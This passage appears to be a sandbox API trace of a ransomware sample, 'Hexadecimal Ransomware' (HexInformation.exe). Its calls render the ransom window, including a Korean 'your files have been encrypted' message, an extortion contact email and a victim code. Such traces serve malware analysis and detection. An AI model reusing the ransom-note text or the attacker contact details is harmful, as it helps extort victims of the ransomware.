dwExStyle=0x0 | out: lpRect=0x11fea78) returned 1 [0156.287] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0156.287] AdjustWindowRectEx (in: lpRect=0x11fea78, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea78) returned 1 [0156.323] GdipLoadImageFromStream (stream=0x3260010, image=0x11fe500) returned 0x0 [0156.324] GdipImageForceValidation (image=0x6e18c80) returned 0x0 [0156.334] GdipGetImageType (image=0x6e18c80, type=0x11fe4fc) returned 0x0 [0156.334] GdipGetImageRawFormat (image=0x6e18c80, format=0x11fe470*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0156.335] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0156.335] AdjustWindowRectEx (in: lpRect=0x11fea78, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea78) returned 1 [0156.335] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0156.335] AdjustWindowRectEx (in: lpRect=0x11fea78, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea78) returned 1 [0156.518] GdipLoadImageFromStream (stream=0x326fff0, image=0x11fe500) returned 0x0 [0156.519] GdipImageForceValidation (image=0x6e19248) returned 0x0 [0156.522] GdipGetImageType (image=0x6e19248, type=0x11fe4fc) returned 0x0 [0156.522] GdipGetImageRawFormat (image=0x6e19248, format=0x11fe470*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0156.523] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0156.523] AdjustWindowRectEx (in: lpRect=0x11fea78, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea78) returned 1 [0156.542] GdipLoadImageFromStream (stream=0x326ffd0, image=0x11fe500) returned 0x0 [0156.655] GdipImageForceValidation (image=0x6e19848) returned 0x0 [0157.341] GdipGetImageType (image=0x6e19848, type=0x11fe4fc) returned 0x0 [0157.341] GdipGetImageRawFormat (image=0x6e19848, format=0x11fe470*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0157.342] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0157.342] AdjustWindowRectEx (in: lpRect=0x11fea78, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea78) returned 1 [0157.406] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0157.406] AdjustWindowRectEx (in: lpRect=0x11feaac, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11feaac) returned 1 [0157.406] GetSystemMetrics (nIndex=59) returned 1460 [0157.406] GetSystemMetrics (nIndex=60) returned 920 [0157.406] GetSystemMetrics (nIndex=34) returned 136 [0157.406] GetSystemMetrics (nIndex=35) returned 39 [0157.407] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0157.407] AdjustWindowRectEx (in: lpRect=0x11fe9ac, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11fe9ac) returned 1 [0157.407] GetCurrentThreadId () returned 0x778 [0157.407] GetCurrentThreadId () returned 0x778 [0157.409] GetCurrentThreadId () returned 0x778 [0157.409] GetCurrentThreadId () returned 0x778 [0157.410] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0157.410] AdjustWindowRectEx (in: lpRect=0x11fe8a4, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe8a4) returned 1 [0157.452] GdipGetFamilyName (in: family=0x11111111, name=0x11fe790, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0 [0157.455] CreateCompatibleDC (hdc=0x0) returned 0x450107b6 [0157.456] GetCurrentObject (hdc=0x450107b6, type=0x1) returned 0xb00017 [0157.456] GetCurrentObject (hdc=0x450107b6, type=0x2) returned 0x900010 [0157.456] GetCurrentObject (hdc=0x450107b6, type=0x7) returned 0x85000f [0157.456] GetCurrentObject (hdc=0x450107b6, type=0x6) returned 0x8a01c2 [0157.457] SaveDC (hdc=0x450107b6) returned 1 [0157.457] GetDeviceCaps (hdc=0x450107b6, index=90) returned 96 [0157.458] CoTaskMemAlloc (cb=0x5c) returned 0x1544c28 [0157.458] CreateFontIndirectW (lplf=0x1544c28) returned 0x4f0a07d0 [0157.458] CoTaskMemFree (pv=0x1544c28) [0157.459] GetObjectW (in: h=0x4f0a07d0, c=92, pv=0x11fe754 | out: pv=0x11fe754) returned 92 [0157.460] GetCurrentObject (hdc=0x450107b6, type=0x6) returned 0x8a01c2 [0157.460] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe6bc | out: pv=0x11fe6bc) returned 92 [0157.460] SelectObject (hdc=0x450107b6, h=0x4f0a07d0) returned 0x8a01c2 [0157.460] GetMapMode (hdc=0x450107b6) returned 1 [0157.461] GetTextMetricsW (in: hdc=0x450107b6, lptm=0x11fe784 | out: lptm=0x11fe784) returned 1 [0157.463] DrawTextExW (in: hdc=0x450107b6, lpchText="Encrypt Type", cchText=12, lprc=0x11fe890, format=0x2400, lpdtp=0x3322e70 | out: lpchText="Encrypt Type", lprc=0x11fe890) returned 18 [0157.670] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0157.670] AdjustWindowRectEx (in: lpRect=0x11fe97c, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe97c) returned 1 [0157.671] GetCurrentThreadId () returned 0x778 [0157.671] GetCurrentThreadId () returned 0x778 [0157.671] GetCurrentThreadId () returned 0x778 [0157.671] GetCurrentThreadId () returned 0x778 [0157.671] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0157.671] AdjustWindowRectEx (in: lpRect=0x11fe8a4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe8a4) returned 1 [0157.672] DrawTextExW (in: hdc=0x450107b6, lpchText="문의하기", cchText=4, lprc=0x11fe890, format=0x2400, lpdtp=0x3323060 | out: lpchText="문의하기", lprc=0x11fe890) returned 18 [0158.066] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0158.066] AdjustWindowRectEx (in: lpRect=0x11fe97c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe97c) returned 1 [0158.066] GetCurrentThreadId () returned 0x778 [0158.066] GetCurrentThreadId () returned 0x778 [0158.066] GetCurrentThreadId () returned 0x778 [0158.066] GetCurrentThreadId () returned 0x778 [0158.067] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0158.067] AdjustWindowRectEx (in: lpRect=0x11fe8a4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe8a4) returned 1 [0158.067] GdipGetFamilyName (in: family=0x11111111, name=0x11fe790, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0 [0158.068] GetDeviceCaps (hdc=0x450107b6, index=90) returned 96 [0158.068] CoTaskMemAlloc (cb=0x5c) returned 0x1544c28 [0158.068] CreateFontIndirectW (lplf=0x1544c28) returned 0x760a07f4 [0158.068] CoTaskMemFree (pv=0x1544c28) [0158.068] GetObjectW (in: h=0x760a07f4, c=92, pv=0x11fe754 | out: pv=0x11fe754) returned 92 [0158.070] SelectObject (hdc=0x450107b6, h=0x760a07f4) returned 0x4f0a07d0 [0158.070] GetMapMode (hdc=0x450107b6) returned 1 [0158.070] GetTextMetricsW (in: hdc=0x450107b6, lptm=0x11fe784 | out: lptm=0x11fe784) returned 1 [0158.071] DrawTextExW (in: hdc=0x450107b6, lpchText="E-Mail: sealocker@daum.net", cchText=26, lprc=0x11fe890, format=0x2400, lpdtp=0x3323460 | out: lpchText="E-Mail: sealocker@daum.net", lprc=0x11fe890) returned 16 [0158.104] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0158.105] AdjustWindowRectEx (in: lpRect=0x11fe97c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe97c) returned 1 [0158.105] GetCurrentThreadId () returned 0x778 [0158.105] GetCurrentThreadId () returned 0x778 [0158.105] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0158.105] AdjustWindowRectEx (in: lpRect=0x11fe8a4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe8a4) returned 1 [0158.105] GdipGetFamilyName (in: family=0x11111111, name=0x11fe790, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0 [0158.105] GetDeviceCaps (hdc=0x450107b6, index=90) returned 96 [0158.105] CoTaskMemAlloc (cb=0x5c) returned 0x1544c28 [0158.106] CreateFontIndirectW (lplf=0x1544c28) returned 0xa0a07ef [0158.106] CoTaskMemFree (pv=0x1544c28) [0158.106] GetObjectW (in: h=0xa0a07ef, c=92, pv=0x11fe754 | out: pv=0x11fe754) returned 92 [0158.106] SelectObject (hdc=0x450107b6, h=0xa0a07ef) returned 0x760a07f4 [0158.106] GetMapMode (hdc=0x450107b6) returned 1 [0158.106] GetTextMetricsW (in: hdc=0x450107b6, lptm=0x11fe784 | out: lptm=0x11fe784) returned 1 [0158.108] DrawTextExW (in: hdc=0x450107b6, lpchText="Hexadecimal Code: FB 69FA 9979\r\n", cchText=32, lprc=0x11fe890, format=0x2400, lpdtp=0x33237d0 | out: lpchText="Hexadecimal Code: FB 69FA 9979\r\n", lprc=0x11fe890) returned 24 [0158.245] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0158.245] AdjustWindowRectEx (in: lpRect=0x11fe97c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe97c) returned 1 [0158.246] GetCurrentThreadId () returned 0x778 [0158.246] GetCurrentThreadId () returned 0x778 [0158.246] GetCurrentThreadId () returned 0x778 [0158.246] GetCurrentThreadId () returned 0x778 [0158.246] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0158.247] AdjustWindowRectEx (in: lpRect=0x11fe8a4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe8a4) returned 1 [0158.247] GdipGetFamilyName (in: family=0x11111111, name=0x11fe790, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0 [0158.247] GetDeviceCaps (hdc=0x450107b6, index=90) returned 96 [0158.247] CoTaskMemAlloc (cb=0x5c) returned 0x1544c90 [0158.247] CreateFontIndirectW (lplf=0x1544c90) returned 0x790a0536 [0158.247] CoTaskMemFree (pv=0x1544c90) [0158.247] GetObjectW (in: h=0x790a0536, c=92, pv=0x11fe754 | out: pv=0x11fe754) returned 92 [0158.248] SelectObject (hdc=0x450107b6, h=0x790a0536) returned 0xa0a07ef [0158.248] GetMapMode (hdc=0x450107b6) returned 1 [0158.248] GetTextMetricsW (in: hdc=0x450107b6, lptm=0x11fe784 | out: lptm=0x11fe784) returned 1 [0158.249] DrawTextExW (in: hdc=0x450107b6, lpchText="oops! 당신의 파일이 암호화 되었습니다!", cchText=24, lprc=0x11fe890, format=0x2400, lpdtp=0x3323c50 | out: lpchText="oops! 당신의 파일이 암호화 되었습니다!", lprc=0x11fe890) returned 29 [0158.625] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0158.626] AdjustWindowRectEx (in: lpRect=0x11fe97c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe97c) returned 1 [0158.626] GetCurrentThreadId () returned 0x778 [0158.626] GetCurrentThreadId () returned 0x778 [0158.626] GetCurrentThreadId () returned 0x778 [0158.626] GetCurrentThreadId () returned 0x778 [0159.280] GetSystemMetrics (nIndex=11) returned 32 [0159.280] GetSystemMetrics (nIndex=12) returned 32 [0159.280] GetDC (hWnd=0x0) returned 0x10105d6 [0159.280] GetDeviceCaps (hdc=0x10105d6, index=12) returned 32 [0159.280] GetDeviceCaps (hdc=0x10105d6, index=14) returned 1 [0159.281] ReleaseDC (hWnd=0x0, hDC=0x10105d6) returned 1 [0159.281] CreateIconFromResourceEx (presbits=0x332c028, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x1302a3 [0159.285] CreateCompatibleDC (hdc=0x0) returned 0x90107f0 [0159.285] GetDC (hWnd=0x0) returned 0x10105d6 [0159.285] GdipCreateFromHDC (hdc=0x10105d6, graphics=0x11fe8d4) returned 0x0 [0159.287] CoTaskMemAlloc (cb=0x5c) returned 0x1544c28 [0159.287] GdipGetLogFontW (font=0x58eef48, graphics=0x6e19d10, logfontW=0x1544c28) returned 0x0 [0159.304] CoTaskMemFree (pv=0x1544c28) [0159.304] CoTaskMemAlloc (cb=0x5c) returned 0x1544748 [0159.304] CoTaskMemFree (pv=0x1544748) [0159.305] CoTaskMemAlloc (cb=0x5c) returned 0x1544c28 [0159.305] CoTaskMemFree (pv=0x1544c28) [0159.305] GdipDeleteGraphics (graphics=0x6e19d10) returned 0x0 [0159.305] ReleaseDC (hWnd=0x0, hDC=0x10105d6) returned 1 [0159.305] CoTaskMemAlloc (cb=0x5c) returned 0x15445a8 [0159.305] CreateFontIndirectW (lplf=0x15445a8) returned 0x40a07f2 [0159.306] CoTaskMemFree (pv=0x15445a8) [0159.306] SelectObject (hdc=0x90107f0, h=0x40a07f2) returned 0x8a01c2 [0159.306] GetTextMetricsW (in: hdc=0x90107f0, lptm=0x11fe9e0 | out: lptm=0x11fe9e0) returned 1 [0159.307] GetTextExtentPoint32W (in: hdc=0x90107f0, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x332d89c | out: psizl=0x332d89c) returned 1 [0159.308] SelectObject (hdc=0x90107f0, h=0x8a01c2) returned 0x40a07f2 [0159.308] DeleteDC (hdc=0x90107f0) returned 1 [0159.309] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.309] AdjustWindowRectEx (in: lpRect=0x11fe748, dwStyle=0x2c70000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11fe748) returned 1 [0159.309] AdjustWindowRectEx (in: lpRect=0x11fe96c, dwStyle=0x2c70000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11fe96c) returned 1 [0159.309] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.309] AdjustWindowRectEx (in: lpRect=0x11fe6c0, dwStyle=0x2c70000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11fe6c0) returned 1 [0159.309] AdjustWindowRectEx (in: lpRect=0x11fe7a4, dwStyle=0x2c70000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11fe7a4) returned 1 [0159.464] GetSystemMetrics (nIndex=59) returned 1460 [0159.464] GetSystemMetrics (nIndex=60) returned 920 [0159.464] GetSystemMetrics (nIndex=34) returned 136 [0159.464] GetSystemMetrics (nIndex=35) returned 39 [0159.465] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.465] AdjustWindowRectEx (in: lpRect=0x11fe650, dwStyle=0x2c70000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11fe650) returned 1 [0159.465] AdjustWindowRectEx (in: lpRect=0x11fe718, dwStyle=0x2c70000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11fe718) returned 1 [0159.465] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.466] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.466] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.466] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.466] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.467] AdjustWindowRectEx (in: lpRect=0x11fe784, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe784) returned 1 [0159.467] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.467] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.467] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.467] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.468] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.468] AdjustWindowRectEx (in: lpRect=0x11fe620, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe620) returned 1 [0159.468] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.468] AdjustWindowRectEx (in: lpRect=0x11fe758, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe758) returned 1 [0159.469] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.469] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x11fe964) returned 1 [0159.469] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.469] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x11fe7c8) returned 1 [0159.469] GetSystemMetrics (nIndex=5) returned 1 [0159.469] GetSystemMetrics (nIndex=6) returned 1 [0159.469] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.470] AdjustWindowRectEx (in: lpRect=0x11fe758, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x11fe758) returned 1 [0159.470] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.470] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.470] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.470] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.470] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.471] AdjustWindowRectEx (in: lpRect=0x11fe620, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe620) returned 1 [0159.471] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.471] AdjustWindowRectEx (in: lpRect=0x11fe758, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe758) returned 1 [0159.471] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.471] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.472] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.472] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.472] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.472] AdjustWindowRectEx (in: lpRect=0x11fe784, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe784) returned 1 [0159.472] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.473] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.473] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.473] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.473] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.473] AdjustWindowRectEx (in: lpRect=0x11fe620, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe620) returned 1 [0159.474] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.474] AdjustWindowRectEx (in: lpRect=0x11fe758, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe758) returned 1 [0159.474] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.474] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.474] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.474] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.475] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.475] AdjustWindowRectEx (in: lpRect=0x11fe620, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe620) returned 1 [0159.475] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.478] AdjustWindowRectEx (in: lpRect=0x11fe758, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe758) returned 1 [0159.479] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.479] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.479] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.479] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.479] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.479] AdjustWindowRectEx (in: lpRect=0x11fe784, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe784) returned 1 [0159.480] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.480] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.480] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.480] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.480] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.481] AdjustWindowRectEx (in: lpRect=0x11fe620, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe620) returned 1 [0159.481] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.481] AdjustWindowRectEx (in: lpRect=0x11fe758, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe758) returned 1 [0159.481] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.481] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.482] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.482] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.482] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.482] AdjustWindowRectEx (in: lpRect=0x11fe784, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe784) returned 1 [0159.482] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.482] AdjustWindowRectEx (in: lpRect=0x11fe964, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe964) returned 1 [0159.482] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.483] AdjustWindowRectEx (in: lpRect=0x11fe7c8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe7c8) returned 1 [0159.483] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0159.483] AdjustWindowRectEx (in: lpRect=0x11fe784, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe784) returned 1 [0159.483] GetCurrentActCtx (in: lphActCtx=0x11fed7c | out: lphActCtx=0x11fed7c*=0x0) returned 1 [0159.483] ActivateActCtx (in: hActCtx=0x153972c, lpCookie=0x11fed8c | out: hActCtx=0x153972c, lpCookie=0x11fed8c) returned 1 [0159.484] GetCurrentActCtx (in: lphActCtx=0x11feb9c | out: lphActCtx=0x11feb9c*=0x153972c) returned 1 [0159.484] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0159.484] AdjustWindowRectEx (in: lpRect=0x11feafc, dwStyle=0x2c70000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x11feafc) returned 1 [0159.484] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0159.484] CreateWindowExW (dwExStyle=0x50000, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName="Hexadecimal Ransomware", dwStyle=0x2c70000, X=-2147483648, Y=-2147483648, nWidth=775, nHeight=712, hWndParent=0x0, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x202c8 [0159.487] SetWindowLongW (hWnd=0x202c8, nIndex=-4, dwNewLong=1950089536) returned 93259198 [0159.487] GetWindowLongW (hWnd=0x202c8, nIndex=-4) returned 1950089536 [0159.488] SetWindowLongW (hWnd=0x202c8, nIndex=-4, dwNewLong=93260510) returned 1950089536 [0159.488] GetWindowLongW (hWnd=0x202c8, nIndex=-4) returned 93260510 [0159.488] GetWindowLongW (hWnd=0x202c8, nIndex=-16) returned 113704960 [0159.488] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x81, wParam=0x0, lParam=0x11fe5c0) returned 0x1 [0159.489] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x83, wParam=0x0, lParam=0x11fe5ac) returned 0x0 [0159.491] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1, wParam=0x0, lParam=0x11fe5c0) returned 0x0 [0159.491] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe278 | out: lpRect=0x11fe278) returned 1 [0159.491] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe278 | out: lpRect=0x11fe278) returned 1 [0159.493] SetWindowTextW (hWnd=0x202c8, lpString="Hexadecimal Ransomware") returned 1 [0159.493] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xc, wParam=0x0, lParam=0x32c52fc) returned 0x1 [0159.494] GetStartupInfoW (in: lpStartupInfo=0x332dfc8 | out: lpStartupInfo=0x332dfc8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0159.497] GetParent (hWnd=0x202c8) returned 0x0 [0159.497] SetWindowLongW (hWnd=0x202c8, nIndex=-8, dwNewLong=0) returned 0 [0159.499] GetSystemMetrics (nIndex=49) returned 16 [0159.499] GetSystemMetrics (nIndex=50) returned 16 [0159.500] CreateIconFromResourceEx (presbits=0x332e048, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x140063 [0159.502] SendMessageW (hWnd=0x202c8, Msg=0x80, wParam=0x0, lParam=0x140063) returned 0x0 [0159.502] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x80, wParam=0x0, lParam=0x140063) returned 0x0 [0159.504] SendMessageW (hWnd=0x202c8, Msg=0x80, wParam=0x1, lParam=0x1302a3) returned 0x0 [0159.504] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x80, wParam=0x1, lParam=0x1302a3) returned 0x0 [0159.504] GetSystemMenu (hWnd=0x202c8, bRevert=0) returned 0x0 [0159.505] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11febac | out: lpwndpl=0x11febac) returned 1 [0159.505] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x0) returned 1 [0159.505] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x0) returned 1 